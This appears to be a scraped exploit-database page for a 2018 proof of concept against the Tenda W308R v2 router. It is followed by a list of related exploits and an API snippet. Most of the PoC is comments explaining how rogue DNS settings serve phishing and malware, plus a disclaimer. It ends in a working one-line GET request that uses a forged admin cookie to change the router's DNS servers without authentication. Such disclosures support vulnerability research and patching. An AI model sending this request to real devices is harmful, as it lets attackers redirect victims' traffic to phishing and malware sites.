Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
"Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change"
Author
"Todor Donev"
Platform
asp
Release date
2018-03-30
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 | # # # Tenda W308R v2 Wireless Router V5.07.48 # Cookie Session Weakness Remote DNS Change PoC # # # Copyright 2018 (c) Todor Donev <todor.donev at gmail.com> # https://ethical-hacker.org/ # https://facebook.com/ethicalhackerorg # # # Once modified, systems use foreign DNS servers, which are # usually set up by cybercriminals. Users with vulnerable # systems or devices who try to access certain sites are # instead redirected to possibly malicious sites. # # Modifying systems' DNS settings allows cybercriminals to # perform malicious activities like: # # o Steering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # # o Replacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # # o Controlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # # o Pushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # # GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-07-10 | "HelloWeb 2.0 - Arbitrary File Download" | webapps | asp | bRpsd |
| 2020-03-16 | "Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)" | webapps | asp | "Miguel Mendez Z" |
| 2020-01-24 | "OLK Web Store 2020 - Cross-Site Request Forgery" | webapps | asp | "Joel Aviad Ossi" |
| 2019-12-18 | "Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting" | webapps | asp | "Harshit Shukla" |
| 2019-11-18 | "Crystal Live HTTP Server 6.01 - Directory Traversal" | webapps | asp | "numan türle" |
| 2019-08-16 | "Web Wiz Forums 12.01 - 'PF' SQL Injection" | webapps | asp | n1x_ |
| 2019-05-06 | "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" | webapps | asp | "felipe andrian" |
| 2019-02-12 | "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" | dos | asp | "Kaustubh G. Padwad" |
| 2018-11-05 | "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" | webapps | asp | "Chris Lyne" |
| 2018-05-29 | "IssueTrak 7.0 - SQL Injection" | webapps | asp | "Chris Anastasio" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/44373/?format=json')
For full documentation follow the link above